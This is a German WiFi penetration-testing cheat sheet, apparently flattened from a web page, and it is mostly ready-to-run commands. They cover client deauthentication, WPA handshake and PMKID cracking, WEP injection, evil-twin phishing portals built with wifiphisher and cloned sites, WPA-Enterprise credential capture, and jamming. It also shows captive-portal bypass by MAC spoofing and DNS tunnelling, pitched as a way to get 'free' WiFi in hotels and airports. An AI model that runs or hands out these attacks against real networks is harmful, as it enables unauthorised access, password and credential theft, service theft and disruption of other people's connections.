
Leitfaden für WLAN-Penetrationstests
2.1. Captive Portale
3.1. Keine Clients
4.1. Knacken des 4-Wege-Handshakes
4.2. PMKID-Angriff
4.3. AP-loser Angriff
5.1. Fake Access Points
5.2. Brute Force
6.1. Krack-Angriff und Frag-Angriff
6.2. OSINT
6.4. Weitere Frameworks
7.2. Arten von Scannern
7.3. Spoofing
VARIABLE=value
iwconfig $IFACE
ifconfig $IFACE
airmon-ng check kill
ifconfig $IFACE down
iwconfig $IFACE mode monitor
ifconfig $IFACE up
Monitormodus setzen
Airodump-ng ausführen
airodump-ng $IFACE -c $CHANNEL -e $ESSID
aireplay-ng -0 $NUMBER_DEAUTH_PACKETS -a $AP_MAC -c $CLIENT_MAC $IFACE
aireplay-ng -0 $NUMBER_DEAUTH_PACKETS -a $AP_MAC $IFACE
Listen Sie die Netzwerke mit Airodump-ng auf und notieren Sie die MAC-Adresse des AP ($AP_MAC) und die eines Clients ($CLIENT_MAC). Beenden Sie die Aufnahme nicht.
In einem anderen Terminal deauthentifizieren Sie einen Client oder alle. Wenn Airodump-ng einen Handshake von diesem Netzwerk erfasst, wird der Name oder die ESSID im ersten Terminal angezeigt:
aireplay-ng -0 $NUMBER_DEAUTH_PACKETS -a $AP_MAC -c $CLIENT_MAC $IFACE
Listen Sie die Netzwerke mit Airodump-ng auf und notieren Sie die MAC-Adresse des AP ($AP_MAC) und die eines Clients ($CLIENT_MAC). Beenden Sie die Aufnahme nicht.
2.a. Wörterbuchangriff ausführen
mdk3 $IFACE p -t $AP_MAC -f $DICTIONARY_PATH
2.b. Oder einen Brute-Force-Angriff ausführen
mdk3 $IFACE p -t $AP_MAC -с $AP_CHANNEL -b $CHARACTER_SET
Für den Zeichensatz können l (Kleinbuchstaben), u (Großbuchstaben), n (Zahlen), c (Klein- und Großbuchstaben), m (Klein- und Großbuchstaben + Zahlen) oder a (alle druckbaren Zeichen) verwendet werden.
Klonen Sie eine Website mit HTTrack
Installieren Sie Wifiphiser. Fügen Sie das HTTrack-Ergebnis in einem neuen Ordner unter wifiphisher/data/phishing-pages/new_page/html und eine Konfigurationsdatei unter wifiphisher/data/phishing-pages/new_page/config.ini hinzu.
Kompilieren Sie das Projekt mit python setup.py install oder der Binärdatei in bin neu.
Dieser Befehl funktioniert korrekt in der neuesten Kali-Version nach der Installation von hostapd:
cd bin && ./wifiphisher -aI $IFACE -e $ESSID --force-hostapd -p $PLUGIN -nE
Die erste Methode zur Umgehung eines Captive Portals besteht darin, Ihre MAC-Adresse in die eines bereits authentifizierten Benutzers zu ändern.
macchanger
Ein benutzerdefiniertes Skript wie dieses(Bash)
Außerdem können Sie Skripte zur Automatisierung des Prozesses verwenden, wie z.B.:
Eine zweite Methode ist das Erstellen eines DNS-Tunnels. Hierfür ist es notwendig, einen eigenen zugänglichen DNS-Server zu haben. Sie können diese Methode nutzen, um das Captive Portal zu umgehen und in Hotels, Flughäfen usw. "kostenloses" WLAN zu erhalten.
nslookup example.com
Einen "A-Eintrag": dns.$DOMAIN zeigt auf $SERVER_IP (Beispiel: dns.domain.com 139.59.172.117)
Einen "NS-Eintrag": hack.$DOMAIN zeigt auf dns.$DOMAIN (Beispiel: hack.domain.com dns.domain.com)
iodined -f -c -P $PASS -n $SERVER_IP 10.0.0.1 hack.$DOMAIN
Überprüfen Sie, ob es korrekt funktioniert hier
Ausführung auf dem Client
iodine -f -P $PASS $DNS_SERVER_IP hack.$DOMAIN
ssh -D 8080 [email protected]
Sobald Sie im Netzwerk sind, können Sie testen, ob es anfällig für Man-in-the-Middle-Angriffe ist.
ARP-Spoofing-Angriff mit Ettercap
Sniffen des Datenverkehrs mit Wireshark oder TCPdump
Analysieren des Datenverkehrs mit PCredz (Linux) oder Network Miner (Windows)
airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $PCAP_FILE $IFACE
aireplay-ng -1 0 -e $AP_NAME -a $AP_MAC -h $MY_MAC $IFACE
aireplay-ng -3 -b $AP_MAC -h $MY_MAC $IFACE
aireplay-ng -0 1 -a $AP_MAC -c $STATION_MAC $IFACE
aircrack-ng $PCAP_FILE
airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $PCAP_FILE $IFACE
aireplay-ng -0 1 -a $AP_MAC -c $STATION_MAC $IFACE
aircrack-ng -w $WORDLIST capture.cap
Sie können Wortlisten von hier herunterladen.
pyrit -r $PCAP_FILE analyze
pyrit -r $PCAP_FILE -o $CLEAN_PCAP_FILE strip
pyrit -i $WORDLIST import_passwords
pyrit eval
pyrit batch
pyrit -r $CLEAN_PCAP_FILE attack_db
Sie können dieses Skript verwenden oder diese Schritte befolgen:
Installieren Sie Hcxdumptool und Hcxtool (Sie können dieses Skript verwenden).
Network Manager stoppen
airmon-ng check kill
3a. Wenn Sie eine bestimmte MAC-Adresse angreifen möchten
echo $MAC | sed 's/://g' > $FILTER_FILE
hcxdumptool -i $IFACE -o $PCAPNG_FILE --enable_status=1 --filterlist=$FILTER_FILE --filtermode=2
hcxpcaptool -z $HASH_FILE $PCAPNG_FILE
Die Struktur jeder Zeile ist: PMKID * ROUTER MAC * STATION * ESSID (überprüfen unter: https://www.rapidtables.com/convert/number/hex-to-ascii.html)
hashcat -a 0 -m 16800 $HASH_FILE $WORDLIST --force
Wenn Sie Zugriff auf ein Client-Gerät haben, bei dem die WLAN-Verbindung eingeschaltet ist, aber kein Netzwerk in der Nähe ist, können Sie dieses Netzwerk dennoch angreifen, falls das Client-Gerät zuvor eine Verbindung dazu hergestellt hat.
Dazu müssen Sie einen Fake Access Point mit hostapd und einer Konfigurationsdatei wie dieser erstellen, mit einem beliebigen Passwort, aber demselben Netzwerknamen. Erstellen Sie das gefälschte Netzwerk, das Client-Gerät wird versuchen, sich damit zu verbinden, und Sie erhalten den 4-Wege-Handshake wie in Abschnitt 4.1 dieser Anleitung.
Falls Sie die virtuelle Maschine nicht verwenden möchten, können Sie alles mit folgendem Befehl installieren:
git clone https://github.com/ricardojoserf/WPA_Enterprise_Attack
cd WPA_Enterprise_Attack && sudo sh install.sh
Starten Sie den Access Point mit:
sh freeradius_wpe_init.sh $AP_NAME $INTERFACE
Wenn ein Client eine Verbindung herstellt, lesen Sie die Protokolle mit:
sh freeradius_wpe_read.sh
sh hostapd_wpe_init.sh $AP_NAME $INTERFACE
Finden Sie unterstützte EAP-Methoden
Dies sind zwei fortgeschrittene Angriffe, die von dem großartigen Mathy Vanhoef entdeckt wurden:
Krack Attack Scripts - Erklärt auf dieser Website
Frag Attack Scripts - Erklärt auf dieser Website
Ein Beispiel, um alle Geräte außer einem Fake Access Point zu deauthentifizieren:
sudo ./wifijammer -i $IFACE -s $FAKE_AP_MAC
Linux:
Windows:
Sobald Sie mit dem Netzwerk verbunden sind
Nmap/Zenmap - Sicherheitsscanner, Portscanner und Netzwerkerkundungswerkzeug
Masscan - Die schnellere Version von nmap (es kann Dinge zerstören, also seien Sie vorsichtig)
Netdiscover - ARP-Sniffing. Sehr nützlich, wenn die Netzwerke sehr stark segmentiert sind
| Betriebssystem | Plattform | Anmeldeinformationen | Größe | Link |
|---|
| Ubuntu 16.04.5 | VMware | ricardojoserf:wifi | 3,25 GB | MEGA |
| Kali 2019.1 | VMware | root:wifi | 4,99 GB | MEGA |
| Ubuntu 16.04.5 | VirtualBox (OVA) | ricardojoserf:wifi | 3,18 GB | MEGA |
| Kali 2019.1 | VirtualBox (OVA) | root:wifi | 5,56 GB | MEGA |